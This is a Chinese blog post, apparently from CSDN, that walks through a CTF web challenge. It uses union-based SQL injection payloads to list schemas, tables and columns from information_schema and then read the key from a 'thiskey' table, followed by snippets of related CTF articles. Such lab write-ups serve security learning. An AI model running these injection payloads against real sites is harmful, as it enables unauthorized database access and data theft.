CTF 这个看起来有点简单!

最新推荐文章于 2024-07-23 15:25:06 发布
最新推荐文章于 2024-07-23 15:25:06 发布
阅读量557 收藏
点赞数
分类专栏: ctf web部分 文章标签: ctf web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_24610803/article/details/78034279
版权

题目链接

跟之前的sql类似,尝试基本的注入

id=1 and 1=1

发现不报错,可以注入。

以一样的方式爆库爆表爆字段,注意输出是两个字段的。

id=1 and 1=2 union select 1,schema_name from information_schema.schemata

id=1 and 1=2 union select 1,table_name from information_schema.tables

id=1 and 1=2 union select 1,column_name from information_schema.columns

最后

id=1 and 1=2 union select 1,k0y from thiskey

得出结果。

sqlmap使用方法可以看官方视频
sqlmap使用

RED_散
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF解题思路
悦分享
07-21 1779
根据题意可能数据包中存在文件传输,尝试直接导出,选择File(文件)-->ExportObjexts(导出对象),然后可以看到一些协议,比如选中http就可以看到通过http传输的一些文件,在右下角有导出按钮,可生生成相应的文件。但是本题中无法用此方法直接看到被下载的文件,因为有些文件是直接通过tcp或udp协议传输的,http协议只能看到的访问的链接,但不会看到传输的内容(比如你去访问放一个链接download.php?第二到第五个都是一样的长度,第六个为1777,应该是剩余的最后一部分数据。...
备战CTF做题题解
weixin_40707492的博客
07-21 6427
备战CTF初期,没有什么经验,部分操作过程有借鉴大佬
CTF练习(3)-这个看起来有点简单!(SQL注入)
qq_35097943的博客
03-19 451
一、打开题目链接 题目链接:http://www.shiyanbar.com/ctf/33 看到一个表格,很容易联想到数据库,不过还是从源码看起 源码中是一个简单的table表格,看到代码中含有’1’,那么再看URl:http://ctf5.shiyanbar.com/8/index.php?id=1,id = 1? 可以分析出这可能是一个SQL注入点。 SQL注入:就是前端通过提...
CTF解题笔记(1)
CODING...
01-09 1万+
因缺思汀的绕过 解题路径:http://ctf5.shiyanbar.com/web/pcat/index.php 打开后是一个登录框类似的东西,查看页面源码可以看到有source:source.txt的字样 打开连接:http://ctf5.shiyanbar.com/web/pcat/source.txt 可以看到登录的php逻辑: <?php error_rep
CTF比赛总结(小白必看)
qq_53272273的博客
05-23 1562
它被设计为tcpdump 和其他使用 libpcap 库的软件使用的原始 PCAP格式的可扩展继承者.目前,只有 Wireshark 可以读取和写入 PCAPNG 文件,而 libpcap(以及使用它的软件)只能读取其中一些文件。:用16进制编辑工具更改图片的高度,会只显示图片的一部分,下面的部分就被隐藏了,可以先看看图片的属性,得到宽高值,找表示宽度和高度的位置的再转成16进制。特征:文由0和1构成,可能由空格、tab或则其他字符分割,去掉这些分割后,0和1的总数是5的倍数。
CTF解题
m0_74097148的博客
11-29 1103
第三题:点击链接后一脸懵,但我看到题目提示肯定用php,于是我加了后缀index.php发现没啥变化,于是就不会了,看了一些大佬的提示,有的是扫目录或者是不断在php后面加后缀,于是得到了index.phps发现出现了一些代码,查看网页源代码进行审计。该代码的意思时不能将id的值通过get传给admin,但必须让admin等于get传值,又由于传得值会经过url解码,(我又得知浏览器会对写入的东西进行一次url解码),因此必须传值的时候进行两次url编码才可以,即对admin进行两次url编码即可。
CTF解题-网安实验室(基础关)
道阻且长,行则将至。
09-07 2015
Base64 编码 什么是Base64编码? 在参数传输的过程中经常遇到的一种情况:使用全英文的没问题,但一旦涉及到中文就会出现乱码情况。与此类似,网络上传输的字符并不全是可打印的字符,比如二进制文件、图片等。Base64的出现就是为了解决此问题,它是基于64个可打印的字符来表示二进制的数据的一种方法。 Base64,就是使用64个可打印字符来表示二进制数据的方法。Base64的索引与对应字符的关...
CTF解题思路笔记
山兔的博客
09-13 2629
1.直接查看网页源码,即可找到 flag。 2.robots.txt 3.查看http请求/响应。 4.302跳转的中转网页有信息。 5.查看开发者工具控制台。 6.javascript代码绕过。 7..bash_history。 8.Webshell: 9.ctf之流量分析:Referer来源伪造; 10.X-Forwarded-For:ip 伪造 。 11.User-Agent:用户代理(就是用什么浏览器什么的)。 12.web源码泄漏: vim源码泄漏,如果发现页面上有提示 vi 或vim,说明存在s
CTF解题基本思路步骤(misc和web
Love&Share
10-22 2万+
平时注意收集做题用到的工具和脚本 知识点总结 步骤使用序号列表,并列使用项目列表 找不到思路,或者是出现异常,就回去仔细读题 文章目录CTF-web基础解题步骤CTF-misc解题思路图片:主要步骤:JPG:特征LsbIDAT隐写修改高度PNG:特征修改高度XORGIF:特征其他:- bgp:音频:视频:逐帧分割其他压缩包:流量:其他:pyc文件相关DTMFpcap文件修复乐符解密linux光盘文件(ext3)pdfpcap文件修复乐符解密linux光盘文件(ext3)pdf 提示:这里对文章进行总结: 例
ctf解题--该题不简单
qq_36791003的博客
08-03 1123
题目 解题链接: http://ctf5.shiyanbar.com/crack/3/ 解题 点击画圈处 保存文件,解压 使用IDA解题具体步骤:http://www.shiyanbar.com/ctf/writeup/576 通过分析可以知道 , 用户输入的用户名的每个字符遍历一遍 把每个字符的序号(从 0 开始算)与这个字符的ASCII码的平方相乘 , 然后整体再加上序号...
CTF——杂项题的基本解题思路
最新发布
qq_73992355的博客
07-23 740
杂项题目有些题目很简单,难题则可能包含杂项、流量分析、密码学、web的知识杂项考的是快速学习能力,基本工具使用能力。
CTF比赛中的常见题型
11-13
CTF比赛中的常见题型目录,给初学者提供学习方向。CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。
[CTF]密码学之维吉尼亚
hclimg的博客
10-03 1682
题目描述 在学习了凯撒大帝使用的神奇密码后,密码前辈们有创造出了更为奇异的加密方法。本题出题者喜欢用helloworld当密钥,密文如下:dlpcsegkshrij,请破解后提交。附录是一张似乎有用的表。答案为非常规形式。 维吉尼亚加密方式(百度百科) 维吉尼亚密码(又译维热纳尔密码)是使用一系列凯撒密码组成密码字母表的加密算法,属于多表密码的一种简单形式。 简而言之就是,纵向的坐标代表秘钥,横向的坐标代表明文,一一对应的中间字母则是密文,密码生成规则是:密码元字符串进行重复重复直到长度和明文或者密文.
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
[初级]sql注入之BUU SQL COURSE 1(爆库、表)
BlingZeng的博客
02-07 3773
这是一道选取自BUUCTF线上平台的sql注入题目,难度为初级。和大家一起学习分享
简单CTF笔记
weixin_60972588的博客
11-26 3197
关于CTF 一, 招新题 总结 1.web历险记------学名:不可还原的拼图 简单的源代码问题,按F12即可找到flag 2.C语言的乐园(C语言) 运用C语言在线编译工具 工具地址:http://www.dooccn.com/c/ 3.摩尔斯的秘密 运用在线莫斯工具解决(也可以手动自己查) 工具地址:https://www.xindb.cn/tools/morse2word 二, 编码 总结 1、编码是将明文转换为另一种形式。密码是将明文加密成密文。 2、编码的目的是为了转换格式。密码的目的
ret2text
m0_54262894的博客
10-28 236
最近攻防世界和BUUCTF中剩下我没做过的题目已经对于我来说有些困难了 所以我在CTF wiki 里开始学习,顺便再巩固一下基础 这里是原文 老样子,先checksec 放入ida中查看 main函数 发现了gets这个危险函数,接着往下看 用Shift+F12查看 发现了/bin/sh 这里你会看到有两个/bin/sh,但我们需要的是text中的地址 记住 text 中 /bin/sh 的地址0x804863A ...
ctf】ret2text
woodwhale的博客
04-17 5720
PWN ret2text 题目链接:ret2text 参考博客:CTF Wiki 基本 ROP 参考视频:【CTF】Linux PWN入门 Bamboofox社课系列 0x01 下载ret2text文件,复制到 翔哥的van美pwn机 中 查看保护机制 Arch: i386-32-little //文件为32位程序 RELRO: Partial RELRO Stack: No canary found //未开启canary保护 NX: NX enabled
CTFpwn:ret2text,mprotece,shellcode,自动化rop链
2302_79813730的博客
01-25 931
text:0000000000401324 75 EA jnz short loc_401310 #对比rbp里的值与rbx里的值,如果相同就继续运行程序,如果不同就返回0x401310。先将栈溢出的返回地址填成0x40132A,将需要的数据依次填入栈顶,依次弹入寄存器中,随后在执行到0x401334,retn返回的时候将返回地址填成0x401310,这样,我们就可以控制edi,rsi,rdx里的值,并调用write函数泄露基址。
CTF挑战:SYSTEM!POWER!提权与账户创建攻略
找到了目标文件,打开并提交了flag,标志着这个CTF挑战的完成。 这个过程中涉及的关键知识点包括: 1. CTF竞赛的基本流程:分析题目、远程连接、权限提升、执行命令、解决问题。 2. 使用Webshell(如菜刀)进行远程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值